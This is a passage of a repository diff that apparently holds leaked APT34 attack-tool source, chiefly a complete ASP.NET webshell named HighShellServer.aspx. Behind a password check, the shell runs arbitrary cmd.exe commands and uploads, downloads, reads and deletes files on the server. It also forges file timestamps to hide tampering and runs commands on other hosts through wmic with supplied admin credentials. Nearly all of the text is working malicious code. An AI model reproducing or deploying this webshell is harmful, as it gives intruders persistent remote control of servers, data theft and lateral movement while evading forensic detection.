System.IO.DirectoryInfo dirInfo=new System.IO.DirectoryInfo(address);
ret ="{"+string.Format("{0},{1}",createJsonDirectory(dirInfo.GetDirectories()),createJsonFile(dirInfo.GetFiles()))+"}";
}
}
}
} catch(Exception ex){
ret ="Error : "+ex.Message;
}
return ret;
}
void exp(string exadd){string ret="Error : -";ret=getDirectoryInfo(exadd);response(ret);}
bool hasErrorInGetSize=false;
int sizelvl=0;
string sizeError;
long GetDirSize(System.IO.DirectoryInfo d){long size=0;try{System.IO.FileInfo[] fis=d.GetFiles();foreach(System.IO.FileInfo fi in fis){size+=fi.Length;}sizelvl++;System.IO.DirectoryInfo[] dis=d.GetDirectories();foreach(System.IO.DirectoryInfo di in dis){size+=GetDirSize(di);}}catch(UnauthorizedAccessException ex){sizeError="Error : "+ex.Message;hasErrorInGetSize=true;}return size;}
string createJsonDirectory(System.IO.DirectoryInfo[] dir){
string json="\"dir\":[";
for (int i=0;i<dir.Length;i++){
if (i>0)json+=",";
json +=string.Format("{{\"name\":\"{0}\",\"mdate\":\"{1}\"}}",dir[i].Name,dir[i].LastWriteTime.ToString("yyyy-MM-dd"));
}
json +="]";
return json;
}
string createJsonFile(System.IO.FileInfo[] file){
string json="\"file\":[";
for (int i=0;i<file.Length;i++){
if (i>0)json+=",";
json +=string.Format("{{\"name\":\"{0}\",\"size\":\"{1}\",\"mdate\":\"{2}\"}}",file[i].Name,sizeFix(file[i].Length),file[i].LastWriteTime.ToString("yyyy-MM-dd"));
}
json +="]";
return json;
}
string sizeFix(long size){double s=size;if(s<1024)return s+" B";s=s/1024;if(s<1024)return Math.Round(s,2)+" KB";s=s/1024;if(s<1024)return Math.Round(s,2)+" MB";s=s/1024;if(s<1024)return Math.Round(s,2)+" GB";s=s/1024;return Math.Round(s,2)+" TB";}
void response(string res){Response.Clear();Response.Write(tb(res));Response.Flush();Response.SuppressContent=true;ApplicationInstance.CompleteRequest();}
void changeTime(string timeh,string tfil,string ttar,string ttim){string ret="Error : -";try {if(!string.IsNullOrEmpty(tfil)){if(timeh=="1")ret=ti(tfil);else if(timeh=="2"){if(!string.IsNullOrEmpty(ttar)){System.IO.File.SetCreationTime(tfil,System.IO.File.GetCreationTime(ttar));System.IO.File.SetLastAccessTime(tfil,System.IO.File.GetLastAccessTime(ttar));System.IO.File.SetLastWriteTime(tfil,System.IO.File.GetLastWriteTime(ttar));ret="Time successfuly changed :<br>"+tfil+"<br>"+ti(tfil);}}else if(timeh=="3"){if(!string.IsNullOrEmpty(ttim)){DateTime te=DateTime.Parse(ttim);System.IO.File.SetCreationTime(tfil,te);System.IO.File.SetLastAccessTime(tfil,te);System.IO.File.SetLastWriteTime(tfil,te);ret="Time successfuly changed :<br>"+tfil+"<br>"+ti(tfil);}}}}catch(Exception e){ret="Error : "+e.Message;}response(ret);}
string ti(string tt){return "Creation Time :\t\t"+System.IO.File.GetCreationTime(tt).ToString("yyyy-MM-dd HH:mm:ss")+"<br>Last Access Time :\t"+System.IO.File.GetLastAccessTime(tt).ToString("yyyy-MM-dd HH:mm:ss")+"<br>Last Write Time :\t"+System.IO.File.GetLastWriteTime(tt).ToString("yyyy-MM-dd HH:mm:ss");}
</script>

1255
APT34/APT34-LeakCode/Webshells_and_Panel/HyperShell/HyperShell/ShellLocal-Special4/HighShellLocal.aspx Normal file
View File

File diff suppressed because it is too large Load Diff

288
APT34/APT34-LeakCode/Webshells_and_Panel/HyperShell/HyperShell/ShellLocal-Special4/HighShellServer.aspx Normal file
View File

@@ -0,0 +1,288 @@
<%@ Page Language="C#" ValidateRequest="false" EnableViewState="false" %>
<%
try
{
NameValueCollection t=HttpContext.Current.Request.Form;
method selectedMethod=method.auth;
try{int methodID=int.Parse(fb(t["m"]));selectedMethod=(method)methodID;}catch{rm();}
p=fb(t["p"]);
adminU=fb(t["adminU"]);
adminP=fb(t["adminP"]);
if(string.IsNullOrEmpty(p)){if(HttpContext.Current.Request.Cookies["p"] != null)p=fb(HttpContext.Current.Request.Cookies["p"].Value);}
if(selectedMethod != method.auth && selectedMethod != method.authAjax && !login(p)){rm();}
switch(selectedMethod){
case method.auth:
case method.authAjax:auth(p);break;
case method.command:
case method.commandAjax:command(fb(t["cmd"]));break;
case method.upload:upload(HttpContext.Current.Request.Files["uploadFile"],fb(t["uploadPath"]));break;
case method.download:download(fb(t["don"]),fb(t["isdel"]));break;
case method.downloadTest:downloadTest(fb(t["don"]));break;
case method.explorer:exp(fb(t["exadd"]));break;
case method.getsize:gsize(fb(t["gsize"]));break;
case method.getlocation:
case method.getlocationAjax:response(getLoc());break;
case method.rename:rename(fb(t["rename1"]),fb(t["rename2"]));break;
case method.copy:copy(fb(t["copy1"]),fb(t["copy2"]));break;
case method.view:view(fb(t["view"]));break;
case method.delete:delete(fb(t["delete"]));break;
case method.multiDelete:multiDelete(fb(t["delete"]));break;
case method.changeTime:changeTime(fb(t["timeh"]),fb(t["tfil"]),fb(t["ttar"]),fb(t["ttim"]));break;
default:break;
}
}
catch(Exception ex){response("Error : "+ex.Message);}
%>
<script runat="server">
enum method{auth=0,command=1,upload=2,uploadbase64=3,delete=4,download=5,changeTime=6,sqlQuery=7,explorer=8,getsize=9,getlocation=10,rename=11,copy=12,view=13,commandAjax=14,downloadTest=15,checkModules=16,installModule=17,uninstallModule=18,cmd7z=19,authAjax=20,getlocationAjax=21,multiDelete=24};
string salt="CNSIFDe12ye3WmzG@q8r)Yf%UU$h8gNTXJOGmCTwX5qKsaUgDM#dlhvHIYR5K0$W";
string p,adminU,adminP;
bool aut=false;
string pp="WDRo4Fhsanhuv6ENFaGkffSVZcxhHYUAxNhxPZ0welo=";
string a(string a,string b){return string.IsNullOrEmpty(a)?b:a;}
string tb(string a){string ret="";try{ret=string.IsNullOrEmpty(a)?a:Convert.ToBase64String(Encoding.UTF8.GetBytes(a));}catch{}return ret;}
string fb(string a){string ret="";try{ret=string.IsNullOrEmpty(a)?a:Encoding.UTF8.GetString(Convert.FromBase64String(a));}catch{}return ret;}
void rm(){Response.Redirect(Request.Url.AbsolutePath.Substring(0,Request.Url.AbsolutePath.LastIndexOf("/")+1)+" "+Request.Url.AbsolutePath.Substring(Request.Url.AbsolutePath.LastIndexOf("/")+1));}
void auth(string p){
string ret=string.Empty;
try {
ret = string.Format("{{\"auth\":\"{0}\",\"loc\":\"{1}\"}}", login(p).ToString(),tb(getLoc()));
} catch(Exception e){
ret ="Error : "+e.Message;
}
response(ret);
}
bool login(string p){bool aut=false;try{if(!string.IsNullOrEmpty(p)){aut=Convert.ToBase64String(new System.Security.Cryptography.SHA256CryptoServiceProvider().ComputeHash(Encoding.ASCII.GetBytes(p+salt)))==pp;}}catch(Exception e){response(e.Message);}return aut;}
void command(string cmd){string ret="Error : -";try{string o=exec(cmd);o=o.Remove(0,o.IndexOf(Environment.NewLine)+2);o=o.Remove(0,o.IndexOf(Environment.NewLine)+2);o=o.Remove(0,o.IndexOf(Environment.NewLine));o=o.Remove(o.LastIndexOf(Environment.NewLine));o=o.Remove(o.LastIndexOf(Environment.NewLine)+2);ret=HttpUtility.HtmlEncode(o);}catch(Exception ex){ret="Error : "+ex.Message;}response(ret);}
void upload(HttpPostedFile uploadFile,string uploadPath)
{
string ret="Error : -";
try {
if (System.IO.Path.IsPathRooted(uploadPath))
{
string FileName = System.IO.Path.GetFileName(uploadFile.FileName);
string FilePath = uploadPath.TrimEnd('\\') + "\\";
if (string.IsNullOrEmpty(System.IO.Path.GetExtension(uploadPath)))
{
if (!System.IO.Directory.Exists(uploadPath))
{
if (!string.IsNullOrEmpty(System.IO.Path.GetFileName(uploadPath)))
{
FileName = System.IO.Path.GetFileName(uploadPath);
FilePath = System.IO.Path.GetDirectoryName(uploadPath) + "\\";
}
}
}
else
{
FileName = System.IO.Path.GetFileName(uploadPath);
FilePath = System.IO.Path.GetDirectoryName(uploadPath) + "\\";
}
if (!System.IO.Directory.Exists(FilePath))
System.IO.Directory.CreateDirectory(FilePath);
uploadFile.SaveAs(FilePath + FileName);
ret ="File uploaded successfully : "+ FilePath + FileName;
}
else
ret="Error : The path is not current format \""+uploadPath+"\"";
} catch(Exception ex){
ret ="Error : "+ex.Message;
}
response(ret);
}
string getLoc(){return Server.MapPath(string.Empty)+"\\";}
void downloadTest(string don)
{
string ret = "Error : -";
try
{
if (!string.IsNullOrEmpty(don))
{
using (System.IO.Stream stream = new System.IO.FileStream(don, System.IO.FileMode.Open))
{
ret = string.Format("File '{0}' is ready for download", don);
}
}
}
catch (Exception e)
{
ret = "Error : " + e.Message;
}
response(ret);
}
void download(string don, string isdel)
{
string ret="Error : -";
try {
if (!string.IsNullOrEmpty(don)){
System.Web.HttpResponse response = System.Web.HttpContext.Current.Response;
response.ClearContent();
response.Clear();
response.ClearHeaders();
response.ContentType = "application/octet-stream";
response.AppendHeader("Content-Disposition", "attachment;size="+new System.IO.FileInfo(don).Length+";filename=" + HttpUtility.UrlEncode(tb(System.IO.Path.GetFileName(don))));
response.WriteFile(don);
response.Flush();
Response.SuppressContent = true;
ApplicationInstance.CompleteRequest();
}
}
catch(Exception e)
{
ret = "Error : " + e.Message;
response(ret);
}
}
string exec(string cmd){string pro="";System.Diagnostics.Process n=new System.Diagnostics.Process();n.StartInfo.FileName=(string.IsNullOrEmpty(pro)?"cmd.exe":pro);n.StartInfo.UseShellExecute=false;n.StartInfo.RedirectStandardInput=true;n.StartInfo.RedirectStandardOutput=true;n.StartInfo.RedirectStandardError=true;n.StartInfo.CreateNoWindow=true;string o=null;n.Start();n.StandardInput.WriteLine(cmd);n.StandardInput.WriteLine("exit");o=n.StandardOutput.ReadToEnd();n.WaitForExit();n.Close();return o;}
void gsize(string addr){string ret="Error : -";try{hasErrorInGetSize=false;long size=GetDirSize(new System.IO.DirectoryInfo(addr));ret=sizeFix(size);if(hasErrorInGetSize && sizelvl==0)ret=sizeError;else if(hasErrorInGetSize)ret="!"+ret;}catch(Exception ex){ret="Error : "+ex.Message;}response(ret);}
void view(string path){string ret="You are viewing the contents of this file : "+path+Environment.NewLine;try{ret+=System.IO.File.ReadAllText(path);}catch(Exception ex){ret="Error : "+ex.Message;}response(HttpUtility.HtmlEncode(ret));}
void delete(string path){
string ret="Error : -";
try {
System.IO.File.Delete(path);
ret =string.Format("{{\"message\":\"{0}\",\"dirInfo\":\"{1}\"}}",tb(string.Format("File '{0}' successfuly deleted{1}",path,Environment.NewLine)),tb(getDirectoryInfo(System.IO.Path.GetDirectoryName(path))));
} catch(Exception ex){
ret ="Error : "+ex.Message;
}
response(ret);
}
void multiDelete(string files)
{
string ret="Error : -";
try{
string[] f = files.Split('|');
ret = string.Format("All '{0}' files successfuly deleted.", f.Length);
foreach (string item in f)
{
System.IO.File.Delete(fb(item));
}
}catch (Exception ex){
ret ="Error : "+ex.Message;
}
response(ret);
}
void rename(string oldName,string newName){string ret="Error : -";try{if(newName.EndsWith("\\"))newName+=System.IO.Path.GetFileName(oldName);System.IO.File.Move(oldName,newName);ret=string.Format("{{\"message\":\"{0}\",\"dirInfo\":\"{1}\"}}",tb(string.Format("File '{0}' successfuly moved to '{1}'{2}",oldName,newName,Environment.NewLine)),tb(getDirectoryInfo(System.IO.Path.GetDirectoryName(oldName))));}catch(Exception ex){ret="Error : "+ex.Message;}response(ret);}
void copy(string oldName,string newName){string ret="Error : -";try{if(newName.EndsWith("\\"))newName+=System.IO.Path.GetFileName(oldName);System.IO.File.Copy(oldName,newName);ret=string.Format("{{\"message\":\"{0}\",\"dirInfo\":\"{1}\"}}",tb(string.Format("File '{0}' successfuly copied to '{1}'{2}",oldName,newName,Environment.NewLine)),tb(getDirectoryInfo(System.IO.Path.GetDirectoryName(oldName))));}catch(Exception ex){ret="Error : "+ex.Message;}response(ret);}
string getDirectoryInfo(string address)
{
string ret="Error : -";
try {
if (address.ToLower()=="root"){
ret ="{\"dir\":[{\"name\":\"\\\\\\\\localhost\"}";
string netUse=exec("net use");
string[] lines=netUse.Split(new string[]{Environment.NewLine },StringSplitOptions.RemoveEmptyEntries);
foreach (string item in lines){
if (item.ToLower().StartsWith("ok")){
int index=item.IndexOf("\\\\");
ret +=",{\"name\":\"\\\\"+item.Substring(index,item.IndexOf('\\',index+2)-index)+"\"}";
}
}
ret +="]}";
} else{
if (address.StartsWith("\\\\")&& address.Trim('\\').Split('\\').Length==1){
string tmp=address.ToLower().TrimEnd('\\');
if (tmp=="\\\\localhost"){
ret ="{\"dir\":[";
bool isStart=false;
foreach (System.IO.DriveInfo item in System.IO.DriveInfo.GetDrives()){
if (item.IsReady){
if (isStart)
ret +=",";
ret +=string.Format("{{\"name\":\"{0}\",\"totalSize\":\"{1}\",\"freeSpace\":\"{2}\",\"sizeText\":\"{3}\",\"format\":\"{4}\",\"type\":\"{5}\"}}",item.Name.TrimEnd('\\').TrimEnd(':')+"$",item.TotalSize,item.TotalFreeSpace,"["+sizeFix(item.TotalFreeSpace)+"] free of ["+sizeFix(item.TotalSize)+"]",item.DriveFormat,item.DriveType);
isStart =true;
}
}
ret +="]}";
} else{
if (!string.IsNullOrEmpty(adminU)&& !string.IsNullOrEmpty(adminP)){
string strWC=@"wmic /node:{0} /user:{1} /password:{2} process call create ""cmd.exe /c > c:\windows\temp\KMSHFX0023{3}.tmp 2>&1 wmic logicaldisk get {4}"" 2>&1";
string strWF=@"\\{0}\c$\windows\temp\KMSHFX0023{1}.tmp";
string strWD=@"del {0} 2>&1";
tmp =tmp.TrimStart('\\');
exec(string.Format(strWC,tmp,adminU,adminP,1,"Caption"));
exec(string.Format(strWC,tmp,adminU,adminP,2,"FileSystem"));
exec(string.Format(strWC,tmp,adminU,adminP,3,"Size"));
exec(string.Format(strWC,tmp,adminU,adminP,4,"FreeSpace"));
exec(string.Format(strWC,tmp,adminU,adminP,5,"Description"));
System.Threading.Thread.Sleep(3000);
string[] diskTemp = new string[100];
for (int i = 1; i <= 5; i++)
{
string f = string.Format(strWF, tmp, i);
string[] lDisk = System.IO.File.ReadAllLines(f);
exec(string.Format(strWD, f));
for (int j = 1; j < lDisk.Length; j++)
{
if (i == 1) diskTemp[j - 1] = lDisk[j];
else diskTemp[j - 1] += "|" + lDisk[j];
}
}
ret = "{\"dir\":[";
bool isStart = false;
foreach (string item in diskTemp)
{
if (!string.IsNullOrEmpty(item))
{
string[] diskInfo = item.Split('|');
long TotalSize = 0;
long TotalFreeSpace = 0;
long.TryParse(diskInfo[2], out TotalSize);
long.TryParse(diskInfo[3], out TotalFreeSpace);
if (isStart)
ret += ",";
ret += string.Format("{{\"name\":\"{0}\",\"totalSize\":\"{1}\",\"freeSpace\":\"{2}\",\"sizeText\":\"{3}\",\"format\":\"{4}\",\"type\":\"{5}\"}}", diskInfo[0].TrimEnd('\\').TrimEnd(' ').TrimEnd(':') + "$", TotalSize, TotalFreeSpace, "[" + sizeFix(TotalFreeSpace) + "] free of [" + sizeFix(TotalSize) + "]", diskInfo[1], diskInfo[4]);
isStart = true;
}
}
ret += "]}";
} else
ret ="Error : Admin Username or Password is empty";
}
} else{
System.IO.FileAttributes attr=System.IO.File.GetAttributes(address);
if ((attr & System.IO.FileAttributes.Directory)==System.IO.FileAttributes.Directory){
System.IO.DirectoryInfo dirInfo=new System.IO.DirectoryInfo(address);
ret ="{"+string.Format("{0},{1}",createJsonDirectory(dirInfo.GetDirectories()),createJsonFile(dirInfo.GetFiles()))+"}";
}
}
}
} catch(Exception ex){
ret ="Error : "+ex.Message;
}
return ret;
}
void exp(string exadd){string ret="Error : -";ret=getDirectoryInfo(exadd);response(ret);}
bool hasErrorInGetSize=false;
int sizelvl=0;
string sizeError;
long GetDirSize(System.IO.DirectoryInfo d){long size=0;try{System.IO.FileInfo[] fis=d.GetFiles();foreach(System.IO.FileInfo fi in fis){size+=fi.Length;}sizelvl++;System.IO.DirectoryInfo[] dis=d.GetDirectories();foreach(System.IO.DirectoryInfo di in dis){size+=GetDirSize(di);}}catch(UnauthorizedAccessException ex){sizeError="Error : "+ex.Message;hasErrorInGetSize=true;}return size;}
string createJsonDirectory(System.IO.DirectoryInfo[] dir){
string json="\"dir\":[";
for (int i=0;i<dir.Length;i++){
if (i>0)json+=",";
json +=string.Format("{{\"name\":\"{0}\",\"mdate\":\"{1}\"}}",dir[i].Name,dir[i].LastWriteTime.ToString("yyyy-MM-dd"));
}
json +="]";
return json;
}
string createJsonFile(System.IO.FileInfo[] file){
string json="\"file\":[";
for (int i=0;i<file.Length;i++){
if (i>0)json+=",";
json +=string.Format("{{\"name\":\"{0}\",\"size\":\"{1}\",\"mdate\":\"{2}\"}}",file[i].Name,sizeFix(file[i].Length),file[i].LastWriteTime.ToString("yyyy-MM-dd"));
}
json +="]";
return json;
}
string sizeFix(long size){double s=size;if(s<1024)return s+" B";s=s/1024;if(s<1024)return Math.Round(s,2)+" KB";s=s/1024;if(s<1024)return Math.Round(s,2)+" MB";s=s/1024;if(s<1024)return Math.Round(s,2)+" GB";s=s/1024;return Math.Round(s,2)+" TB";}
void response(string res){Response.Clear();Response.Write(tb(res));Response.Flush();Response.SuppressContent=true;ApplicationInstance.CompleteRequest();}
void changeTime(string timeh,string tfil,string ttar,string ttim){string ret="Error : -";try {if(!string.IsNullOrEmpty(tfil)){if(timeh=="1")ret=ti(tfil);else if(timeh=="2"){if(!string.IsNullOrEmpty(ttar)){System.IO.File.SetCreationTime(tfil,System.IO.File.GetCreationTime(ttar));System.IO.File.SetLastAccessTime(tfil,System.IO.File.GetLastAccessTime(ttar));System.IO.File.SetLastWriteTime(tfil,System.IO.File.GetLastWriteTime(ttar));ret="Time successfuly changed :<br>"+tfil+"<br>"+ti(tfil);}}else if(timeh=="3"){if(!string.IsNullOrEmpty(ttim)){DateTime te=DateTime.Parse(ttim);System.IO.File.SetCreationTime(tfil,te);System.IO.File.SetLastAccessTime(tfil,te);System.IO.File.SetLastWriteTime(tfil,te);ret="Time successfuly changed :<br>"+tfil+"<br>"+ti(tfil);}}}}catch(Exception e){ret="Error : "+e.Message;}response(ret);}
string ti(string tt){return "Creation Time :\t\t"+System.IO.File.GetCreationTime(tt).ToString("yyyy-MM-dd HH:mm:ss")+"<br>Last Access Time :\t"+System.IO.File.GetLastAccessTime(tt).ToString("yyyy-MM-dd HH:mm:ss")+"<br>Last Write Time :\t"+System.IO.File.GetLastWriteTime(tt).ToString("yyyy-MM-dd HH:mm:ss");}
</script>

1255
APT34/APT34-LeakCode/Webshells_and_Panel/HyperShell/HyperShell/ShellLocal/HighShellLocal/HighShellLocal.aspx Normal file
View File

File diff suppressed because it is too large Load Diff

Some files were not shown because too many files have changed in this diff Show More